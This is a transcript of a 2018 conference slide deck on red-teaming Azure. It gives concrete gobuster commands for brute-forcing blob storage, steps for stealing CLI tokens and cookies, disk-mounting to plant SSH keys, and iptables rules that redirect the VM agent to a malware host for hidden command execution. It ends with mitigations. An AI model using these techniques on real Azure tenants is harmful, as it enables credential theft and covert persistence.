Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Blue Cloud of Death: Red Teaming Azure

Blue Cloud of Death: Red Teaming Azure

BSides Denver Presentation on May 11 2018

On-demand IT services are being publicized as the “new normal”, but often times these services are misunderstood and hence misconfigured by engineers which can frequently enable red teams to gain, expand, and persist access within Azure environments.

In this talk we will dive into how Azure services are commonly breached (e.g. discovering insecure blob storage), and then show how attackers are pivoting between the data & control planes (e.g. mounting hard disks, swapping keys, etc...) to expand access. Finally we will demonstrate some unique techniques for persisting access within Azure environments for prolonged periods of time.

Bryce Kunz (@TweekFawkes) is an Information Security Researcher located in Salt Lake City, Utah. Bryce currently leads the security offensive testing of Adobe's Marketing Cloud SaaS infrastructure via researching and developing custom exploits for web applications and other cloud based technologies. As a security professional, Bryce has spent time at various agencies (i.e. NSA, DoD, DHS, CBP) focusing on vulnerability research, penetration testing, and incident response. Bryce received an MBA from a NSA designated "Center of Excellence" Idaho State University (ISU) program with an emphasis in Information Assurance (IA) on a full academic scholarship from the National Science Foundation (NSF). Bryce holds numerous certifications (e.g. OSCP, CISSP, ...) and has spoken at various security conferences (i.e. DerbyCon, etc...).

TweekFawkes

May 11, 2018
Tweet

More Decks by TweekFawkes

Other Decks in Technology

Transcript

  1. BLUE CLOUD
    OF DEATH
    Red Teaming Azure

    View full-size slide

  2. AGENDA

    Agenda
    • Who Am I?
    • Azure Overview
    • Initial Access
    • Storage Access
    • Endpoint Access
    • Expanding Access
    • Persisting Access
    Bryce Kunz
    @TweekFawkes

    View full-size slide

  3. THE PAST
    RED & BLUE...
    Red Team
    Adobe
    Digital Experience (DX)
    Bryce Kunz
    @TweekFawkes
    Offense
    NSA
    Defense
    DHS SOC

    View full-size slide

  4. THE PRESENT
    CYBER SECURITY SERVICES
    Stage 2 Security BSidesSLC
    ( CyberSecurity Services ) ( By & For the People )
    Stage2Sec.com BSidesSLC.org
    Bryce Kunz
    @TweekFawkes

    View full-size slide

  5. TRAINING
    AWS & AZURE EXPLOITATION:
    MAKING THE CLOUD RAIN SHELLS!
    CNO.io -Training
    (Salt Lake City, Utah)
    July 12th & 13th
    SOLD OUT!
    BlackHat USA
    (Las Vegas, NV)
    August

    View full-size slide

  6. Azure Overview

    View full-size slide

  7. CLOUD
    Azure CIoud
    My boss assured me,
    that’s all we needed to know… :P

    View full-size slide

  8. DESIGN
    Azure CIoud
    Portal Control Data
    cloud demystified!

    View full-size slide

  9. ADMINS
    Azure CIoud
    Portal Control Data
    Admin

    View full-size slide

  10. CONTROL
    Azure CIoud
    Portal Control Data
    Admin
    … From our vantage point …
    … mostly just REST APIs …

    View full-size slide

  11. DATA
    Azure CIoud
    Portal Control Data
    Admin
    … here lies user/customer/account data …

    View full-size slide

  12. SERVICES
    Azure CIoud
    Portal
    VMs
    Control
    Storage
    Data
    Apps
    Admin
    …too many for any human to care about…
    LBs

    View full-size slide

  13. SERVICES
    Portal
    VMs
    Control
    Storage
    Data
    Apps
    Admin
    …too many for any human to care about…
    LBs
    Azure CIoud

    View full-size slide

  14. AGENTS
    Azure CIoud
    Portal
    VMs
    Control
    Storage
    Data
    Apps
    Admin

    LBs
    Agent

    View full-size slide

  15. DEVS
    Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    Dev
    CI
    Pipeline
    VMs

    View full-size slide

  16. USERS
    Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev

    View full-size slide

  17. Dooms Day

    View full-size slide

  18. DEVOP-OCALYPSE
    Bryce Kunz - @TweekFawkes
    … $50k!?!?!?

    View full-size slide

  19. DEVOP-OCALYPSE
    Bryce Kunz - @TweekFawkes
    …EC2 instances destroyed…

    View full-size slide

  20. ACCOUNTS

    Customer Types:
    • Standard
    • Enterprise Agreement
    • - Departments
    Account Admin
    Service Admin
    Co-Admin
    Subscription
    (e.g. IT)
    Azure Account (Center)
    Subscription
    (e.g. R&D)
    RG
    Stage
    RG
    Prod
    R R R R
    RG
    Stage
    RG
    Prod
    R R R R
    Service Admin
    Co-Admin

    View full-size slide

  21. Initial Access

    View full-size slide

  22. OSINT
    Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker

    View full-size slide

  23. GITHUB
    Bryce Kunz - @TweekFawkes
    Google Dork:
    site:github.com web.config
    "StorageConnectionString"
    "DefaultEndpointsProtocol"

    View full-size slide

  24. PASTEBIN
    Bryce Kunz - @TweekFawkes
    Find a Azure Secrets
    • Collaboration
    • - PasteBin.com

    View full-size slide

  25. REPOS
    Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos

    View full-size slide

  26. BITBUCKET
    Bryce Kunz - @TweekFawkes
    Find a Azure Secrets
    • Open Source Intel
    • Code Repositories
    • - BitBucket, GitLab
    • - Gerrit, GitBlit, Git
    • - SVN, etc…

    View full-size slide

  27. CI
    Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos

    View full-size slide

  28. DEPLOY
    ACCESS
    Bryce Kunz - @TweekFawkes
    Find a Azure Secrets
    • Open Source Intel
    • Code Repositories
    • Deployment Tools
    • - Puppet, etc…
    • - Jenkins, etc…

    View full-size slide

  29. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos
    ENDPOINT

    View full-size slide

  30. HACK & D/L
    ACCESS
    Bryce Kunz - @TweekFawkes
    Find a Azure Secrets
    • Open Source Intel
    • Code Repositories
    • Deployment Tools
    • Configuration Files
    • - Classic Hacks
    • -- D/L Secrets

    View full-size slide

  31. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos
    MANY ROADS
    TO PWNAGE

    View full-size slide

  32. I
    Heart
    AWS
    &
    Azure!
    Just in case you think AWS or Azure is bad…
    Here is what I really like about it!
    • Assessment Management is Awesome!
    • Scaling of Logging can be Amazing!
    • Read-Only / Auditor Access is Easy to Setup!

    View full-size slide

  33. Azure Storage

    View full-size slide

  34. STORAGE

    VMs
    Storage
    LBs
    Users
    Web Server
    Apps

    View full-size slide

  35. STORAGE

    VMs
    Storage
    LBs
    Users
    Web Server
    Apps
    Hacker

    View full-size slide

  36. AZURE BLOBS
    Endpoints: https://myaccount.blob.core.windows.net/mycontainer/myblob
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    Container Name: containertest005
    Blob Name: test.txt

    View full-size slide

  37. DNS BRUTE FORCE
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    - Only contains lowercase letters and numbers.
    - Name must be between 3 and 24 characters.

    View full-size slide

  38. GOBUSTER - DNS
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    gobuster -m dns -u "blob.core.windows.net" -i -t
    100 -fw -w /root/blobdns/3_chars.txt

    View full-size slide

  39. DNS BRUTE FORCE


    - Only contains lowercase letters and numbers.
    - Name must be between 3 and 24 characters.
    Lower Chars & Nums Count Run Time (100 Threads)
    3 46,656 ~1 min
    4 1,679,616 ~25min
    5 60,466,176 ~15 hours
    6 … etc … … etc …

    View full-size slide

  40. GOBUSTER - DIR
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    gobuster -m dir -u
    “https://bcodstoragetest005.blob.core.windows.n
    et” -i -t 100 -e -s 200,204 -w quickdir.txt

    View full-size slide

  41. AZURE BLOB NAMES
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    Container Name: containertest005
    Blob Name: test.txt

    View full-size slide

  42. BRUTE FORCE
    Possible but kind of sucks to brute force or guess three separate variables/parameters in the URL.
    e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
    Storage Account Name: bcodstoragetest005
    Container Name: containertest005
    Blob Name: test.txt

    View full-size slide

  43. STORAGE

    VMs
    Storage
    LBs
    Users
    Web Server
    Apps
    Hacker

    View full-size slide

  44. NIMBUSLAND
    Check if an IP address is Azure or AWS

    View full-size slide

  45. LOLRUSLOVE
    Spider Website for Links to Azure Blobs
    • CNAME Lookup on FQDNS
    TODO: INSERT Screen Shot
    TODO: Demo?

    View full-size slide

  46. Storage Access

    View full-size slide

  47. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos
    STORAGE

    View full-size slide

  48. FIND CERT
    *.publishsettings
    Get-AzurePublishSettingsFile
    • Management Certificates
    A "publish settings file" is an XML file with a .publishsettings file name extension. The file
    contains an encoded certificate that provides management credentials for your Azure
    subscriptions.

    View full-size slide

  49. FIND SECRET
    “web.config” - ASP.NET
    “app.config” - C#.NET
    • SAS URI
    • Connection String
    • Account Name & Key

    View full-size slide

  50. STORAGE EXPLORER
    “Install Azure Storage Explorer”

    View full-size slide

  51. STORAGE EXPLORER
    • SAS URI
    • Connection String
    • Account Name & Key

    View full-size slide

  52. STORAGE EXPLORER
    • Download Files!
    • Modify Files!

    View full-size slide

  53. VHDS
    *disks*
    • vhds!

    View full-size slide

  54. VHDS
    Download vhds
    • Code Review
    • Secrets on Disk
    • Linux - grep for “shadow” hashes

    View full-size slide

  55. VHDS
    Download vhds
    • Code Review
    • Secrets on Disk
    • Linux - grep for “shadow” hashes

    View full-size slide

  56. MANAGED DISKS
    2017 Azure Feature
    • By Default…
    • No VHDs in blob storage containers!

    View full-size slide

  57. Storage Persistence

    View full-size slide

  58. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos
    STORAGE

    View full-size slide

  59. STORAGE EXPLORER
    Create SAS!
    • Another way to access the resource

    View full-size slide

  60. DEMo: SAS Offline Minting!

    View full-size slide

  61. SAS TOKEN OFFLINE
    MintyOffline
    Append the Following:
    - Storage Account Name
    - Permissions, Protocol
    - Service, Resource Type
    - Start Time, Expire Time
    - & API Version
    HMAC to creation token using:
    - Key -> Storage Key
    - Msg -> Appended String
    - SHA256
    Formatting of the Data (e.g. Encode)

    View full-size slide

  62. CLI Endpoint Access

    View full-size slide

  63. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos
    ENDPOINT

    View full-size slide

  64. SETUP CLI
    “Install Azure CLI 2.0 on Windows”

    View full-size slide

  65. CLI AUTH.
    “az login”
    (After logging in, your login token is
    valid until it goes for 14 days without
    being used.)

    View full-size slide

  66. BROWSER COOKIE
    “az login”
    (After logging in, your login token is
    valid until it goes for 14 days without
    being used.)

    View full-size slide

  67. STEAL COOKIE!
    “az login”
    (After logging in, your login token is
    valid until it goes for 14 days without
    being used.)

    View full-size slide

  68. CLI AUTH.
    “az login”
    (After logging in, your login token is
    valid until it goes for 14 days without
    being used.)

    View full-size slide

  69. AUTH. TOKEN “.azure” folder
    “azureProfile.json”

    View full-size slide

  70. STEAL TOKEN“.azure” folder
    “accessTokens.json”

    View full-size slide

  71. WHOAMI
    “az account show”

    View full-size slide

  72. Expand Access

    View full-size slide

  73. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Hacker
    DATA -> CONTROL

    View full-size slide

  74. AZURE META
    Metadata Service: 169.254.169.254
    curl http://169.254.169.254/metadata/v1/maintenance
    curl http://169.254.169.254/metadata/v1/InstanceInfo
    (these are mostly useless for hackers…) but useful information is copied into the …
    /var/lib/waagent directory when the instance is created… (root access needed)
    • IP address, hostname, subscription ID, resource group name, etc…

    View full-size slide

  75. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Hacker
    CONTROL -> DATA

    View full-size slide

  76. CAPTURE IMAGE

    View full-size slide

  77. HARD BOOT
    Google: “Reset local Windows password for Azure VM offline”

    Horrible OPSEC but it works…
    - Power off a server
    - Mount the server’s hard drive using another VM
    - Modify the server for remote access (e.g. add an SSH key to root user)
    - Power back on the server & PROFIT!

    View full-size slide

  78. RESET

    Windows
    • RDP Password Reset
    Linux
    • SSH Key Reset
    • Create User

    View full-size slide

  79. SCRIPTS

    Linux
    • VM Extension - CustomScript

    View full-size slide

  80. Persistence

    View full-size slide

  81. Azure CIoud
    Portal Control
    Storage
    Data
    Apps
    Admin

    LBs

    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Collaboration
    Hacker
    Repos
    CONTROL

    View full-size slide

  82. SERVICE PRINCIPALS
    (the recommended approach)
    Permissions-Restricted Accounts
    “az login --service-principal” …
    …not tied to any particular user…
    …have permissions on them assigned
    through pre-defined roles.
    Multiple Passwords!

    View full-size slide

  83. AGENTS
    Azure CIoud
    Portal
    VMs
    Control
    Storage
    Data
    Apps
    Admin

    LBs
    Agent

    View full-size slide

  84. DOCUMENTATION?
    Where we're going, we don't need docs!

    View full-size slide

  85. START DIGGING
    • ps auxfww
    • file
    • python source code review
    Listening Services
    • netstat -nltpu
    Active Connections
    • netstat -natpu

    View full-size slide

  86. • b: set a breakpoint
    • c: continue debugging until you hit a breakpoint
    • s: step through the code
    • n: to go to next line of code
    • l: list source code for the current file (default: 11 lines including the line being executed)
    • u: navigate up a stack frame
    • d: navigate down a stack frame
    • p: to print the value of an expression in the current context
    PYTHON DEBUGGER
    • pdb

    View full-size slide

  87. SYSDIG sysdig -w 005.scap
    systemctl start walinuxagent.service
    /usr/bin/python3 -u /usr/sbin/waagent –daemon
    sysdig -r 005.scap …
    • -c topfiles_bytes
    • -c topprocs_net
    • -c echo_fds
    • -c fdbytes_by fd.directory "fd.type=file“
    • -c fdbytes_by fd.filename
    "fd.directory=/var/lib/waagent“

    View full-size slide

  88. TCPDUMP ip.addr == 168.63.129.16

    View full-size slide

  89. AGENTS
    Azure CIoud
    Portal
    VMs
    Control
    http://168.63.129.16
    Storage
    Data
    Apps
    Admin

    LBs
    Agent

    View full-size slide

  90. TASKS
    Periodically pulls HTTP API for taskings
    • http://168.63.129.16
    • (local azure fabric address)
    2
    • Signals agent for additional tasks
    Control
    http://168.63.129.16
    GET /machine/?comp=goalstate
    ---
    2…
    Agent

    View full-size slide

  91. HOST CONFIGS
    Pulls hostingEnvironmentConfig
    Control
    http://168.63.129.16
    GET /machine/

    type=
    hostingEnvironmentConfig
    ---
    rd_fabric_stable_dhf5.150807-
    2320.RuntimePackage_1.0.0.14.
    zip
    Agent

    View full-size slide

  92. CERTS
    Pulls certificates
    Control
    http://168.63.129.16
    GET /machine/

    comp=certificates
    ---
    pfx
    Agent

    View full-size slide

  93. EXTENSION CONFIGS
    Pulls Extension Configuration
    • In this case, the command to run
    Control
    http://168.63.129.16
    GET /machine/

    type=extensionsConfig
    ---
    Command to Run
    Agent

    View full-size slide

  94. the Journey!

    View full-size slide

  95. VMs
    Portal Control
    Storage
    Data
    Admin


    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Hacker
    Repos
    CREDS IN REPO

    View full-size slide

  96. VMs
    Portal Control
    Storage
    Data
    Admin


    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Hacker
    Repos
    VHDS -> CERTS

    View full-size slide

  97. VMs
    Portal Control
    Storage
    Data
    Admin


    CI
    Pipeline
    Users
    VMs
    Dev
    Internet
    Hacker
    Repos
    SUBSCRIPTION

    View full-size slide

  98. VMs
    Control
    Storage
    Data Users
    VMs
    Hacker
    CUSTOM SCRIPT

    View full-size slide

  99. PERSIST?
    Without getting caught?
    Bypass
    • File Integrity Monitoring
    • So we can’t modify files
    • osquery - process list
    • So we can’t be seen in ps
    • osquery - netstat
    • So we can’t be seen in netstat
    … ?

    View full-size slide

  100. VMs
    Storage
    Users
    Hacker
    AGENT
    Control
    http://168.63.129.16
    Agent
    VMs
    10.0.4.4
    Already Running
    Pulling for Updates…

    View full-size slide

  101. VMs
    Storage
    Users
    Hacker
    BEACHHEAD
    Control
    http://168.63.129.16
    Malware
    Agent
    Beachhead
    10.0.4.5
    VMs
    10.0.4.4
    Ideally…
    • Not of high value
    • Not monitored closely
    Install our Malware
    • To ensure access

    View full-size slide

  102. VMs
    Storage
    Users
    VMs
    10.0.4.4
    Hacker
    REDIRECT
    Control
    http://168.63.129.16
    Beachhead
    10.0.4.5
    Malware
    Agent
    Redirect Agent
    • via iptables
    iptables -t nat -I OUTPUT
    -p tcp --dport 80 -d
    168.63.129.16 -m
    comment --comment
    "totes not evil" -j DNAT --
    to-destination
    10.0.4.5:80
    Netstat Looks Normal!
    No New Procs!

    View full-size slide

  103. VMs
    Storage
    Users
    VMs
    10.0.4.4
    Hacker
    MITM
    Control
    http://168.63.129.16
    Beachhead
    10.0.4.5
    Malware
    Agent
    Pass API Requests
    • via mitmproxy
    iptables -t nat -I OUTPUT
    -p tcp --dport 80 -d
    10.0.4.5 -m comment --
    comment "totes not evil"
    -j DNAT --to-destination
    168.63.129.16:80
    MITM

    View full-size slide

  104. VMs
    Storage
    Users
    Hacker
    EXEC
    Control
    http://168.63.129.16
    Beachhead
    10.0.4.5
    Malware
    Tasks Created within the
    Azure Subscription for
    the Beachhead with the
    MITM software on it,
    which will get redirected
    and executed on the
    remote target through
    the pulling process of the
    Azure endpoint agent
    MITM
    Agent
    VMs
    10.0.4.4

    View full-size slide

  105. DEMo: C2 via waagent Redirection

    View full-size slide

  106. GOING THE DISTANCE!
    • Only match the redirect during certain times of the day
    • man iptables-extensions -> time
    • … -m time --timestart 01:00 --timestop 02:00 --days Mon,Tue,Wed,Thu,Fri …
    • Match the redirect periodically
    • pulls via GETs every 3 seconds
    • … -m limit -limit … -limit-burst …

    View full-size slide

  107. MITIGATIONS
    • Single Purpose Secrets
    • Limited the Access of each Secret
    • Create roles and limit the access of each role
    • You can ACL off secrets to only work from certain IP addresses
    • Log API calls (e.g. cloudtrail)
    • Never use root secrets (use as a break glass account only)
    • Rotate Secrets Frequently
    • Encrypt secrets within GIT and other data stores

    View full-size slide

  108. THANKS!
    Stage 2 Security
    ( Red Teaming AWS & Azure Env. )
    Stage2Sec.com
    Bryce Kunz
    @TweekFawkes
    CNO.io -Training
    (Salt Lake City, Utah)
    July 12th & 13th

    View full-size slide